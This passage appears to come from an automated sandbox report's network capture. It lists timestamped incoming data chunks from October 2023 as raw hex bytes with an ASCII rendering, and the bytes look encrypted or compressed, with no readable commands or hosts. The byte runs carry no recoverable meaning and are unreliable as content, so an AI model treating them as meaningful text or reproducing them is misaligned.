11 43 b4 86 f4 96 ee 7b 31 59 4f 9b 72 7b 30 8d 30 55 35 e3 08 b2 89 91 98 60 28 a6 b8 73 20 7f ab c0 fd a0 c3 cf ac da 3a b1 72 1f dc a6 3b 81 61 30 Data Ascii: ,{_cK;-w0V2{?&LQr,+[7W]{CP6<Io}mdxC9yuaH1lBA{Mnz18)c-]6pIJ%]rQE/1Ah#Py:Va~4jNSC{1YOr{00U5`(s :r;a0
2023-10-13 13:21:12 UTC	528	IN	Data Raw: b4 3c 2d 3f e5 c1 b5 34 ce 93 d6 7d c7 35 0a db b6 d2 2c 8a f4 c5 17 2c 6d ee 7c c6 8e 4d ce df ab f9 63 59 56 fb ae 71 74 79 bf 61 79 7a 76 13 38 9e da 58 c9 fa ec 8f f1 a4 d2 81 5f 4f 7d 8a 96 75 48 1a 41 55 65 3d 41 72 41 9a 15 bf 7c 81 d7 d8 8b b3 9d 07 96 62 81 7c 8f 14 eb 07 84 f0 92 4b c6 ec e1 cb 47 f6 93 ef 67 44 f8 e2 fa 05 9e 76 79 7c 2f e5 f1 85 ab f5 2b e2 f6 76 10 4e 9d ff a5 a0 34 e0 97 f8 ec 5d 23 fa 2c 14 ef 71 56 78 48 35 57 ce fc f3 2d f8 22 2f 52 42 dd 18 32 3b 3d d2 9e 92 9a bb c4 3f f2 9c 7a 4a 97 b3 68 24 c1 ea 72 b5 29 ca c6 b7 61 c2 6a bd b6 22 78 39 78 e3 86 a1 77 4f ca f9 2b d0 dc 8c eb ef 65 cc 90 b1 a8 4c 5a 71 c9 a2 8c 4a f5 98 11 a7 98 85 d2 7e 71 16 a0 7d 11 45 8a 77 02 66 cd 4d 77 ae 33 f5 c9 bd a3 3a 9e 1c 3c ba b6 9f 15 Data Ascii: <-?4}5,,m\|McYVqtyayzv8X_O}uHAUe=ArA\|b\|KGgDvy\|/+vN4]#,qVxH5W-"/RB2;=?zJh$r)aj"x9xwO+eLZqJ~q}EwfMw3:<
2023-10-13 13:21:12 UTC	544	IN	Data Raw: 9b 69 f2 01 48 2a 0f 5f e3 59 fe 7c 10 b5 7c 17 70 d1 26 20 ba 34 9f aa a3 26 b0 88 f4 4c d1 ca 13 40 f6 77 ef 29 76 e5 6e 03 47 8f ab 7c 8b 88 75 0d ac a1 6d 8d 8c 17 f6 bd 1f 3f d3 4d 75 61 de 9f 9f 08 05 ca f5 05 94 78 24 f4 bb c0 91 6f 76 3f 0f 07 48 71 7b 6d aa 0e 3d 77 c8 31 f9 e1 41 cb c5 40 d2 58 76 fd 27 36 bd 87 70 c2 10 38 72 fa c4 4b 94 90 2d f2 65 96 bf d1 52 a6 87 cb e3 69 61 46 8d b9 8f 0c 2b 45 78 fe 76 96 ae cd 79 ba e9 23 75 26 60 57 69 6c e5 00 0d ae d9 ea a0 e5 da 7c 1c 68 19 37 55 c7 82 41 23 4e f6 77 ba 5b a2 42 7d 65 58 27 9e 3b 5e aa 5e d0 71 88 65 95 b8 0d ec bd b4 1d 2b c8 c0 8d a1 82 8d a6 39 08 f8 1a c1 31 6b 24 ca 63 8a d8 c7 1c b7 ab 6d 74 e9 f1 92 93 32 18 22 f2 80 35 56 0c 2c ae 3e 9f 55 90 ae c2 a1 49 51 98 fc 77 50 ce 45 Data Ascii: iH*_Y\|\|p& 4&L@w)vnG\|um?Muax$ov?Hq{m=w1A@Xv'6p8rK-eRiaF+Exvy#u&`Wil\|h7UA#Nw[B}eX';^^qe+91k$cmt2"5V,>UIQwPE
2023-10-13 13:21:12 UTC	552	IN	Data Raw: 03 76 96 d0 51 31 36 ac c0 85 63 81 02 51 c2 18 00 2a 24 8a d2 a5 b5 17 42 b9 48 25 4f 38 29 a6 98 3b 3f ea 35 6c 7b 98 04 7c 42 e6 27 b4 24 fc 33 14 79 94 9b b1 f5 6f 1e 21 48 b4 e6 91 e1 3e 69 5c c9 76 83 d0 7b da e6 1d 43 3b fa 57 ba 06 ef 2f 00 54 de cb 66 8e 48 71 04 ac ab 6c e3 9f f8 41 b8 5b b4 58 17 a8 fc a9 d2 80 7a a1 48 48 f3 0c 4f 34 92 a5 10 b5 1c 28 43 01 39 88 cf 41 7e 1d 3c 34 e8 c9 5a 2b e1 c3 e0 c6 d0 bf 89 bd 3c 0d 70 a0 76 e9 6c 55 e2 09 be 00 2a 09 04 02 69 a3 0d bc 23 ab 0f 12 ac 6a f5 f5 38 a8 62 4e 2e fe be f7 82 85 5d 28 f3 3d bd 80 96 97 13 ff 69 95 75 55 78 d9 4f af 67 74 20 52 41 c8 ff 03 12 39 8b 7d 68 f9 94 23 20 73 bf 4b e2 7d 67 90 99 1b f5 f1 7d 8a bc 5c 33 8e a3 e1 f6 1c 7f ec 0d 1c d1 74 59 e0 2a 78 4b 30 ba 55 98 55 1b Data Ascii: vQ16cQ$BH%O8);?5l{\|B'$3yo!H>i\v{C;W/TfHqlA[XzHHO4(C9A~<4Z+<pvlUi#j8bN.](=iuUxOgt RA9}h# sK}g}\3tY*xK0UU
2023-10-13 13:21:12 UTC	568	IN	Data Raw: 11 d2 45 a9 a9 d2 32 ca ae fa 3d d0 e0 91 7f aa 3a c0 91 70 50 1c 2b 09 27 4e 40 66 40 65 da bd f2 13 3e 0b 03 57 c5 d5 16 95 28 ca 2f 13 21 f4 80 a1 11 73 93 f5 ca 1b e1 c8 0a 3f ce c5 b2 d0 82 c9 d6 02 2d 65 85 03 8d 44 95 a9 04 8d 57 fe 29 ed d7 f9 e2 55 2e 2d ae 8f 11 86 1d bf 69 74 11 97 89 49 b6 18 65 42 3b 55 94 d2 8d e6 95 3d 30 fd a3 17 ce df c5 3e cd e0 ee 3e 3f d3 95 be 3a ec 83 3d 56 2a bb c4 a1 5f 39 af c3 0b ec 1c ae 1f 67 b7 c1 19 b4 6d 2c a4 21 8a 16 5e 78 77 0c 11 71 0d f3 f0 3e 19 e6 64 34 49 99 bc ed 4b 5e 89 e5 f9 6f 98 2a 2d 60 17 da 89 15 25 e5 2c a2 66 fa 69 f5 c5 01 25 58 0e 5b a8 af 4e 9e ef 97 8b 69 7a a0 35 50 b7 6d 1b b3 b2 92 40 e0 72 96 21 51 8f 22 cf 72 fa 93 26 36 42 68 06 5c 28 b4 39 0f cc 07 51 5e b1 ec 73 a7 53 65 d3 94 Data Ascii: E2=:pP+'N@f@e>W(/!s?-eDW)U.-itIeB;U=0>>?:=V_9gm,!^xwq>d4IK^o-`%,fi%X[Niz5Pm@r!Q"r&6Bh\(9Q^sSe
2023-10-13 13:21:12 UTC	584	IN	Data Raw: 28 cf 6f 68 be f5 11 d6 00 65 42 0f 34 0a c1 24 02 c6 b6 a8 5d 93 8d 71 c8 3e 45 2a 1e 04 e3 86 ba b9 89 bc a3 8f 47 cd 28 a3 3d 7d ed dd 45 96 d9 f8 48 28 5d 6c 06 08 60 c2 b2 8b 4b 7a fd 79 fd e2 61 35 d9 5c 8d 35 9f e8 ae 96 ba 71 89 69 e2 bf 0d 6d fd 34 a0 31 30 0f 9d 12 42 9d e8 bd 1b 2e 49 08 5f 93 dc b6 12 11 36 58 d7 33 bb 82 28 66 1e 19 59 2c 74 d3 67 c6 8f 28 81 4f 1c b8 54 14 14 1d 4a 98 d3 79 7d e6 55 6f a2 48 f6 71 45 70 b9 97 3f 07 3d 92 65 c5 3e 83 e1 55 d5 95 82 26 b4 7a 8f 06 6b 4f d6 e4 86 99 ff eb b5 40 bd 51 e8 77 96 c7 63 5d de ed b0 54 89 82 7f 37 26 27 30 a8 c2 e8 75 72 08 9a cb e3 e0 64 f8 01 d2 14 89 2e e0 ad 06 9c 84 8f 8c d2 0a 6e e6 b4 2e c3 6e 7a b5 19 bd 0b a0 92 b1 b9 b1 4a 43 71 ef 3f 2e c1 47 8d bf 15 ac f0 95 d9 00 3f 3b Data Ascii: (oheB4$]q>E*G(=}EH(]l`Kzya5\5qim410B.I_6X3(fY,tg(OTJy}UoHqEp?=e>U&zkO@Qwc]T7&'0urd.n.nzJCq?.G?;
2023-10-13 13:21:12 UTC	600	IN	Data Raw: 71 9d 62 ba 26 5a ee 29 94 aa 70 15 01 dd 3d 8e 6f 89 e0 7f e6 a0 e3 78 07 84 ce 31 f0 c0 e0 5e f5 3e 10 55 5c c6 c8 d2 4b 16 27 04 38 66 d4 cf 8b 4f 1e 61 2d c0 e3 9f 5c b9 8a 10 1d bb e4 42 a1 cf 55 bf b5 3e f4 32 0a d1 02 65 71 3a e9 b8 e8 23 3f 1d 49 ba 65 72 be 25 ea f8 a3 33 b7 4a 8a 5d 00 de 31 6f 8d fe ce af 09 7c c6 62 c4 41 e6 56 70 e9 bf b5 84 f6 b8 11 22 fd 2e c8 65 f7 12 d4 e3 f0 e6 63 86 05 6e b4 dd ee b5 75 9f 04 c8 82 51 10 9e 91 8e e9 b3 f6 1f ad 79 40 74 b7 93 1e 69 58 19 8f 5c 38 0f fb b9 aa d4 3a 3b 61 08 cf 4a e6 44 de b6 5f bf 2e 3f 1d 84 53 09 ef f0 3d e5 2d 8a b5 ee 63 90 25 3a cc 4e 12 17 0e 05 18 1f 14 ae a0 a7 eb 82 83 cb 30 28 2d da 47 ae 62 12 a1 ed 70 95 0a 07 a5 ad a7 0d ed 7b 7f 60 e5 4d 39 86 80 75 42 c9 99 ad 93 4b 9d f3 Data Ascii: qb&Z)p=ox1^>U\K'8fOa-\BU>2eq:#?Ier%3J]1o\|bAVp".ecnuQy@tiX\8:;aJD_.?S=-c%:N0(-Gbp{`M9uBK
2023-10-13 13:21:12 UTC	616	IN	Data Raw: 65 96 5b 99 be 9d d7 e0 aa f3 e1 51 31 26 b1 22 8b fd 62 ab d0 7d bf 37 a5 6e ed bb 4f e2 04 da fd df de e8 c5 90 53 ce 31 cd 9f 6a 8b 5b 48 9f 59 33 a8 46 3b 86 56 57 81 7d f0 fb ba a7 bf c7 1e de d9 82 be c9 c3 bc 36 d2 9a 31 42 7a 11 0a f8 77 f6 2c 6f 0f df 04 de 29 8b 67 00 f1 fe ce 64 49 60 6b 04 df 31 09 b4 2e 06 a0 18 ba b9 9b c7 c7 6b 10 29 d3 b1 c3 de 50 a7 49 66 10 ae 87 c1 b3 6d 17 9b ba 0a 63 45 3c a8 c8 56 25 5e 58 5c 29 a7 97 51 6c 8d e7 f0 ae cd b9 62 8d c7 21 a4 a8 1a 35 b0 c2 66 0e 8b f9 a6 00 42 0c 65 bf 33 3d ac af 6b 22 81 97 8c 58 79 d0 86 c4 be fa 08 99 07 07 6f 47 30 40 f6 52 95 04 7c da 1b 7c 62 09 bf a5 60 c0 b1 66 c6 e6 04 75 1b 6e 93 77 dc 74 33 0e 48 30 61 b6 98 4c fc da 12 2d 01 d9 62 4c 1c 07 56 a1 e9 68 1e da cc cd 48 c8 87 Data Ascii: e[Q1&"b}7nOS1j[HY3F;VW}61Bzw,o)gdI`k1.k)PIfmcE<V%^X\)Qlb!5fBe3=k"XyoG0@R\|\|b`funwt3H0aL-bLVhH
2023-10-13 13:21:12 UTC	632	IN	Data Raw: 85 1f 4d 6f ec c2 bc 59 ad 88 85 be b3 d5 7d 97 93 f0 83 c3 46 ea ec 98 2e 03 82 28 53 64 47 26 37 a9 1f d1 59 46 a6 64 ad a0 97 41 60 e1 a5 b4 47 79 9b 57 6c 64 36 e5 40 f8 a2 ab 33 37 4e f7 d0 60 c4 3f 9c 85 b0 90 4e 8f 8d 92 c1 29 ff fe 12 4e fe 8d 39 89 e1 20 38 bb e6 52 2e 77 dd 7a cd fe 33 7b b5 4a 3a 8a 9e fe df 4a a7 ae 2b 8e 70 bc 8d 22 c0 1e be db 14 5b 08 df 41 57 3e 08 b9 fb b0 3c fb 66 30 31 8b aa a3 d7 fd dc 7f af 35 ff 2c 11 2b 6c 86 32 5f 5e 3e 04 45 9f f3 f2 9c 21 99 1c 1e 85 1a 9a b0 e4 01 79 4e dc ab d3 8a 73 38 19 34 e0 99 4e 80 1b 67 1a 79 4b 02 93 e7 19 ad b0 88 41 f4 21 43 4a 7b 3e 7e b2 17 5a d9 b5 5c 52 e7 23 62 6f 55 49 c7 4a f0 02 57 1e 35 9b b3 af 43 01 b6 9b 7f 44 2b a9 fa 37 06 81 92 63 f5 8c 82 44 5d 74 55 01 4f db 6e a3 26 Data Ascii: MoY}F.(SdG&7YFdA`GyWld6@37N`?N)N9 8R.wz3{J:J+p"[AW><f015,+l2_^>E!yNs84NgyKA!CJ{>~Z\R#boUIJW5CD+7cD]tUOn&
2023-10-13 13:21:12 UTC	712	IN	Data Raw: 5d b1 22 1a fd 57 ef 81 40 0f 2a 86 d2 90 a6 84 83 a5 81 db 2e 75 20 0a a7 72 d6 7d d8 b8 bd a6 e9 5c c6 9f 9d ad 41 b7 78 90 c8 35 15 cc 09 de 91 58 bf cf 9c d9 be da 9d dc cc 87 9f 08 71 3d a8 86 74 55 04 b6 18 21 4a 2f 8b a4 b7 57 ce fc 6e 58 1d e2 c8 9d 5c 8c 29 b7 43 29 40 7e 39 07 b4 d8 b8 a5 ef 0f aa 78 fb b3 b4 cc 1f e5 f9 64 9f a6 c2 37 ba f8 1e 78 01 81 19 b1 2d 1a 29 70 5f 51 31 d1 2f 36 c8 38 24 76 8b f3 bb 65 da e2 00 48 86 ec 4d c9 39 54 a2 f9 ee 6e bc 2f 8c e2 a6 eb 45 5e b5 63 47 7d 32 f4 7a 9b a0 81 34 60 2d 2f 5e 60 6f d3 30 a6 a7 3d 13 e8 94 7d fb 06 06 c1 bf 55 38 f4 53 3a 51 f8 79 60 15 81 10 48 50 5f c9 00 9f 48 b5 00 1b b7 74 b8 b9 6e 3c 6c 21 1e a5 9d b3 94 e7 21 2c b7 3d 2b a8 2e ce f4 ff ed b7 47 c0 c6 73 0c 8d 51 70 75 c4 c2 6f Data Ascii: ]"W@*.u r}\Ax5Xq=tU!J/WnX\)C)@~9xd7x-)p_Q1/68$veHM9Tn/E^cG}2z4`-/^`o0=}U8S:Qy`HP_Htn<l!!,=+.GsQpuo
2023-10-13 13:21:12 UTC	728	IN	Data Raw: a0 73 83 bb 0b 60 84 6e 57 2d ad 68 c6 7d 8d 36 84 a4 e1 52 7d 7d a1 46 cb ec 39 25 84 64 06 30 0e d4 cc 0a 27 d4 1e 1d 88 a7 b9 0a 1a bf 98 40 ed 10 78 1a f6 34 65 f7 00 97 a0 7b 71 24 97 31 c0 c1 5f 0e 21 0f 5a 11 3a d0 fa 72 4c 11 b7 b4 44 5a a5 39 5a 3d 54 56 49 31 64 f6 8c 9d 3e 0b 4b d6 f5 75 bf 65 0d 1d ec 82 60 93 6a af 3e d3 e6 67 f6 3f 5b 0b 16 ad be 14 c7 81 9a 07 1c d0 54 fe 48 81 b2 6a 35 c3 f6 1e 77 58 a0 01 93 34 ff 3d 52 c4 25 dd 51 50 1c 11 4f d3 0e c4 9b 79 e6 d0 f2 1e 73 6a 5b 31 da 42 a9 fd f3 23 b1 0b 66 61 f7 59 1e 98 3b 69 d6 7e 76 cb d5 22 d4 4d 8d 8b 61 e8 d3 57 d9 d9 25 78 bb eb ca c5 8c 85 b6 4a 38 36 1e ae 07 66 6d 41 ed 62 82 45 7a 48 98 3d 99 14 b6 84 41 7a b6 23 e2 8a 83 9e 87 69 28 6a 6d 7e 3f 6f 7e 80 4f cf 97 b8 22 a5 a1 Data Ascii: s`nW-h}6R}}F9%d0'@x4e{q$1_!Z:rLDZ9Z=TVI1d>Kue`j>g?[THj5wX4=R%QPOysj[1B#faY;i~v"MaW%xJ86fmAbEzH=Az#i(jm~?o~O"
2023-10-13 13:21:12 UTC	744	IN	Data Raw: 82 3c ee de d9 50 4d 54 c3 80 08 fd f3 f9 9c d4 75 ce d7 9a c2 be df 95 74 c7 72 e9 ad 13 19 db 76 68 21 47 c5 53 eb 5a a7 51 70 12 e9 3b 54 23 42 9d e9 2e cf fa 08 19 e4 51 02 fa bb 16 ef c7 b6 27 7e 87 fa 68 94 0a 55 a3 2b 95 29 93 8d f5 61 c0 42 69 09 56 07 fa b4 43 fe 2e da 9e ad b3 41 a8 87 91 c0 69 40 9e 29 d1 95 4c cb c0 61 7b 8c cd 3d 8a a2 6e ea fe c4 a3 58 38 a4 77 8c 27 fc be c3 7c 40 98 bd d2 8b 1e 49 a9 2a 27 b3 1c ae bd 30 27 31 fe 2e e1 94 2d d0 e7 a1 4a 82 23 b7 23 db 56 d5 75 09 8b de 5c 51 60 e0 7b 9b ba c8 71 72 4a 7e 52 82 4b 53 f6 53 fd 87 96 26 16 91 5d 40 9a 1c 3d b5 16 32 84 98 7b 00 37 d4 f0 40 0d c7 eb ef 35 c3 62 03 ce 64 59 13 64 5f 6b 3e 57 99 17 33 ed ce cc 51 c8 cf 71 08 89 d3 8c 21 ee 5f a2 15 a3 03 0d ae a2 10 ac f1 d6 7f Data Ascii: <PMTutrvh!GSZQp;T#B.Q'~hU+)aBiVC.Ai@)La{=nX8w'\|@I*'0'1.-J##Vu\Q`{qrJ~RKSS&]@=2{7@5bdYd_k>W3Qq!_
2023-10-13 13:21:12 UTC	760	IN	Data Raw: 7f 2b ec fb 91 f8 71 a2 1b 0d 7d dc fb 87 e9 d9 5e 58 59 45 a4 9b 16 bb 5b 3e 10 a5 63 18 75 a0 78 52 98 89 dc f8 30 05 f3 27 a3 32 94 e6 a0 a9 f7 90 58 6b ff 1a 99 80 a3 cb 28 0c 3e c1 07 6a 27 b5 82 be c7 7b 14 7f 7e 73 a2 04 ba 4d a1 6f e0 32 fe 7b 2e a9 ac 22 39 21 c7 b3 4d 32 5d e6 cb df 31 fa 1e c0 70 0e 69 c5 25 d7 19 ea ea 73 ce 46 c7 2a 7b dd db 62 78 b0 9d b0 eb d9 99 3e 9d 15 76 16 62 a2 cf f6 77 7a 1f 8c ec 1e 48 d2 3c 2c 62 4e 2e 12 da e3 57 05 ab ca 23 a9 73 47 47 5a 38 f3 d7 18 db 04 ea 95 40 96 80 9f 55 df de c9 71 e5 96 fe ce 95 b4 05 81 23 7a fa 16 eb 30 4f 50 67 f3 6c 82 bd 93 c6 d2 88 63 65 81 34 6e b8 ce 52 93 09 f7 fe 2d 41 5c 7e 05 12 22 5d d7 4b 7c 86 9b 74 01 11 f5 71 65 66 dd b6 2e d5 fe c8 cb 6f 96 31 b6 40 ea a8 7d 1f c9 45 61 Data Ascii: +q}^XYE[>cuxR0'2Xk(>j'{~sMo2{."9!M2]1pi%sF*{bx>vbwzH<,bN.W#sGGZ8@Uq#z0OPglce4nR-A\~"]K\|tqef.o1@}Ea
2023-10-13 13:21:12 UTC	776	IN	Data Raw: 3b 90 56 ec 1b bb d0 e2 72 ed e5 3d 94 1c 5d 05 b4 27 01 0a e9 d1 86 80 d2 5d 2e 43 3d df 08 e4 9c bd 69 37 51 94 0d 3a 12 28 c5 d6 d1 87 fd 5d ea 7a 0e 91 d9 a2 21 83 e7 fb 93 2b 90 6c 72 33 4d af 67 f7 4e 9f f2 10 2e d3 17 24 0c cd 48 b1 26 a6 ce 32 fb 7f 14 a7 00 63 ce 9b a2 d2 be 1a 84 fe 48 07 3e 8a 54 f1 ee 3b 1b 84 7c 5a e0 84 09 ac 70 4a b6 4a a7 af 4d 2f 12 b3 2b f7 88 a2 c0 9d c5 30 a3 ae 26 8c 56 68 84 e4 d9 47 77 bc 7e 9a 5d 10 39 e4 9a ec 47 ef 2c d1 53 75 27 17 60 8a 34 ad 30 da 0a ce 73 d3 4c ac c9 89 12 3d b2 c9 14 48 4b 1a ce 87 04 1d fa 03 b6 c7 84 8f 73 57 52 1a 1d e7 6b 64 70 f7 7f 90 da c4 5f fb f7 06 2d 5a 64 6c d0 1c 2d b8 a8 4a c3 2d 94 03 3a a6 b7 cb 29 fd bf bb 73 6e 97 a5 d4 eb 24 8c 35 bc e7 28 fc 36 b5 51 af 20 bc 8e 5a 4c 1d Data Ascii: ;Vr=]'].C=i7Q:(]z!+lr3MgN.$H&2cH>T;\|ZpJJM/+0&VhGw~]9G,Su'`40sL=HKsWRkdp_-Zdl-J-:)sn$5(6Q ZL
2023-10-13 13:21:12 UTC	792	IN	Data Raw: 9b f8 c5 05 00 22 91 4e 5e 82 4a cd f6 7c 43 bc 4d e8 b2 90 18 1b 2e e7 c6 bf dd b3 42 54 27 91 ce d0 fa 5c 81 76 58 96 b7 87 ef 30 56 73 2f 37 37 36 31 69 6c ca e4 85 58 cc 0d c6 0b 12 17 9d c5 fa 5d 36 3a ab 15 21 ba a3 c0 50 20 d5 3a 23 ab f2 d6 20 35 a9 38 58 ef b9 72 ac 71 0d 94 a3 3c d9 62 56 2f 3a 1d 00 85 b7 b1 ed e6 f6 5c 1d 14 51 0b 0f 38 89 64 0d 12 08 96 10 60 2b 29 b3 21 ec 6b cd bb 62 64 65 eb 81 9e ab 99 16 b3 0b b9 cc a2 f6 4e 8e d6 6f 7d b0 48 98 06 63 a6 f0 5c 8f cf b0 a8 e6 63 77 2a d5 2f ce 48 d2 1d 55 d1 d8 db f8 e8 af 25 3c 62 fc d0 bf 9d 62 f0 e3 92 c2 2a 1b e8 50 37 c3 68 aa 26 6a fb cc 04 90 41 0b 6a c9 bb 3b 6c 04 6c f0 dc 42 19 f0 dc 54 69 ee 37 d3 1d 4a 13 ca b1 25 ed 1e a5 11 3b 73 ba 38 4b e7 1f aa e8 bc ff e2 ba db 16 5c 04 Data Ascii: "N^J\|CM.BT'\vX0Vs/7761ilX]6:!P :# 58Xrq<bV/:\Q8d`+)!kbdeNo}Hc\cw/HU%<bbP7h&jAj;llBTi7J%;s8K\
2023-10-13 13:21:12 UTC	808	IN	Data Raw: 1b e5 2a ef 78 c4 a6 f5 da 4d f9 57 03 82 e4 79 2e 9d 4a cd 0a af 52 00 e9 f6 84 e0 41 d3 78 07 bb f2 27 4a 55 5e 33 06 6f dd c5 61 97 93 82 fb ca 8b 80 96 b7 3f 15 39 d0 1f 35 8d 36 88 2a 87 94 0a 41 af 47 48 8f f2 a3 71 a6 11 b9 e7 f0 fd 21 71 46 5e 62 c1 a7 51 b7 15 d4 4f a5 7f 8e de 92 1c d8 30 11 3d 90 04 53 df b3 4e 8a fe 8b 02 75 9c 3e 4a c9 52 49 4f d9 bb e3 f9 cd f4 2c ea 01 63 04 87 9d 0e 29 83 c4 51 85 18 d0 47 1f 87 1c fc c6 e2 86 cb 2b 47 7c f2 26 d1 a5 84 3c 65 a8 0c e6 6d b9 25 6d 6a 1e 2e 4a 43 1a 19 b2 51 e5 b8 15 97 50 ae 87 8d a6 3c f0 6c 6a 9e 82 6e 41 36 7b 49 f5 95 db 68 cb 69 a4 54 c8 3f cd a3 ca fd 04 7d c1 e8 b6 77 9f 87 33 cf e4 26 da 4b 47 02 0a 78 89 6a 0a 4c d9 ea 32 c9 e0 92 9d 38 b0 0b 09 ee 3d 49 51 c5 8c 38 a8 e6 1e ae 92 Data Ascii: xMWy.JRAx'JU^3oa?956AGHq!qF^bQO0=SNu>JRIO,c)QG+G\|&<em%mj.JCQP<ljnA6{IhiT?}w3&KGxjL28=IQ8
2023-10-13 13:21:12 UTC	824	IN	Data Raw: ef 98 98 5d f0 43 23 dc 95 57 25 1e 8c 7d d2 b0 9d d3 eb 48 fd f9 d8 5a 11 dd 32 9c 28 f2 52 66 9b 8b 05 2e 44 03 94 42 11 df 91 8f 7d 8d 57 37 6b e1 3a 2f 4b 30 8c c7 61 b3 d1 2d c1 52 3a c4 c1 2b 61 7e 6f bc 4d 91 44 45 ac ad ee 93 dd 2a 93 68 79 a6 4e fc fe 46 31 cd 40 7b 74 81 e7 5f 37 45 a9 3a dc 06 5a 8d 84 80 d6 c1 a8 1b 71 d0 0f 5f 65 05 44 cc 2d d3 9c f1 af 81 ec 5f 5b 98 25 da fc f4 e6 39 22 d5 84 68 29 59 f0 ce 98 38 f2 0f 5c 6f 7f b6 0e f6 6d 47 b4 24 ba 33 53 89 4b 3a 94 d7 e1 47 c5 a6 f8 c5 9d 43 2b 98 92 64 0e 79 ff 68 f2 de cd 90 1c d6 41 15 57 59 20 a0 ad 5c 8f 68 be 03 fa 0b ac 7d 13 26 ac f9 8a bb ce 42 7d 7a de 34 45 86 72 09 42 70 a4 07 b9 b7 fc 3a 93 4d d9 1f a8 7b a2 c0 4b e9 67 e6 e2 2d 7d cd 39 76 2d 7f 86 da fe ac 08 e3 37 4d 4d Data Ascii: ]C#W%}HZ2(Rf.DB}W7k:/K0a-R:+a~oMDE*hyNF1@{t_7E:Zq_eD-_[%9"h)Y8\omG$3SK:GC+dyhAWY \h}&B}z4ErBp:M{Kg-}9v-7MM
2023-10-13 13:21:12 UTC	840	IN	Data Raw: 0c 6d 3a 96 3b 37 cc 0e 8c 8b 54 97 c6 89 41 46 4b d2 05 f7 d1 3c 61 1c 06 7b eb 2d e5 b5 ee a5 c3 6a df 66 a1 d8 e4 2d 4b b3 bd 57 7f 30 2d 6e d0 9d 1c 6d ac 01 c2 4d 66 ed 59 b2 ce 9d e5 7c b9 14 01 e5 fd eb c4 40 bb 3a dc bf b5 dc d3 89 d7 0b 2b d3 81 ae 4a 8e 83 a4 cc 32 64 c9 9a d3 b6 4f e3 fb f8 3e 72 15 a1 64 29 90 53 62 3e ff 0b c2 99 7c 9f 8f e4 c1 26 d2 2c a3 84 5e e0 63 e5 54 0b 12 75 50 4f a3 9c cd 7e 3b 91 6a c2 7f f7 48 9c b3 8d e9 0d 99 c8 4d bf 67 3b 8b a6 b2 09 a7 d2 7d ed 93 20 77 03 1b 2a 12 ac a3 16 90 10 da 60 6c dc e7 13 61 b2 d3 be 31 52 0c 0d 66 96 2d aa 4c aa 54 e3 11 1a 95 a7 62 de 75 30 81 da d1 79 60 93 7a 98 bf 5f a5 fb 46 97 95 4e 68 5a c9 7a 07 d7 8a f4 42 36 99 10 9b 8e 12 7c 76 c7 e2 1f d8 f8 fc c7 cf e2 69 4d 78 93 0a 5b Data Ascii: m:;7TAFK<a{-jf-KW0-nmMfY\|@:+J2dO>rd)Sb>\|&,^cTuPO~;jHMg;} w*`la1Rf-LTbu0y`z_FNhZzB6\|viMx[
2023-10-13 13:21:12 UTC	856	IN	Data Raw: ea b8 82 b2 0c 06 7c a1 2d fa 29 d8 cf f2 a8 eb 1c 69 a3 9e 42 10 10 47 bd 21 d8 5f 83 c4 71 58 43 7a e3 05 fa 96 eb 76 8b 26 dd 0f 57 f0 fd dd 1f b4 55 7a b6 5c 87 37 f1 65 c1 d8 b1 95 ba d3 5e 3d e9 37 8f e0 76 19 69 1a ef cb 89 55 41 49 cd 1f 87 9c 1b 85 b4 fc db 6d 2d 15 76 8b e0 49 2f 16 9f 82 7d d3 58 3b dd 01 f6 e4 37 8a c8 5f 1f 52 ab 24 07 73 61 b0 76 48 f1 5a 8c fa 66 55 cf d7 88 ea 46 73 2d f4 ec 4e a4 f0 04 79 89 8d 56 ee d1 64 20 2a cd 9a e8 23 71 89 61 41 9c 07 fe 59 b3 c2 0d f0 5c 06 48 2d 1b 53 03 02 3d 6c 29 c4 a1 14 54 35 82 d6 ed c2 e1 e3 8b f0 dd 69 57 03 6f 37 d7 ec 4f 19 b4 71 32 37 94 40 92 28 bf 7d 06 68 c4 42 ff 83 0e e4 54 5d 4a cd dc 15 21 0e 74 f5 52 76 46 ad 93 8f 2b 61 10 f8 f5 11 cb e9 61 e4 64 15 f7 5f ec 99 11 40 e2 98 a4 Data Ascii: \|-)iBG!_qXCzv&WUz\7e^=7viUAIm-vI/}X;7_R$savHZfUFs-NyVd *#qaAY\H-S=l)T5iWo7Oq27@(}hBT]J!tRvF+aad_@
2023-10-13 13:21:12 UTC	872	IN	Data Raw: 82 e7 bb 34 86 7d f0 57 3e 6f 60 92 b5 d8 c8 c9 2b a8 c5 42 cb bf 87 d5 c1 d0 ef 5e ec 12 af 86 64 04 09 76 74 0c 8c a0 10 8f f0 d4 5e fc 8d 86 5d 97 33 69 e8 16 a0 aa 1e 49 bd 12 e9 b5 9b 3e b9 f7 e7 3c 13 b1 7f f9 0f 6c d2 09 55 8d 75 53 87 d1 de 15 ad f0 36 59 79 53 5f 08 d3 65 8e 18 cd f2 1e cb d7 fb cf 50 a2 43 e0 dc a3 5b 20 78 d6 fa d5 14 04 e1 87 fe b6 fc bc 2b 69 1b 8a e6 2d cf c3 38 2a 08 77 2b e9 c5 36 1d d7 aa 81 c7 4e d8 3e b3 41 f0 f2 b8 83 bb e3 0c 26 4c 4e 48 43 57 e5 9a e2 34 a1 10 fd 2e aa 36 64 62 92 ef 0b c1 30 fe 64 82 88 0c 30 d9 da 51 d4 26 3a 90 32 a0 8c 3e e1 b5 fb 74 81 ee 16 65 44 c7 48 76 99 12 4c 29 60 52 c1 df 1a 30 a3 6e 9b 39 76 88 6a 3a fc 9e c1 e5 9f b2 dc fa 95 6b 49 0d 5c a6 53 d4 66 7b 33 7b 0e a9 3f 5c fb e4 12 d5 14 Data Ascii: 4}W>o`+B^dvt^]3iI><lUuS6YyS_ePC[ x+i-8*w+6N>A&LNHCW4.6db0d0Q&:2>teDHvL)`R0n9vj:kI\Sf{3{?\
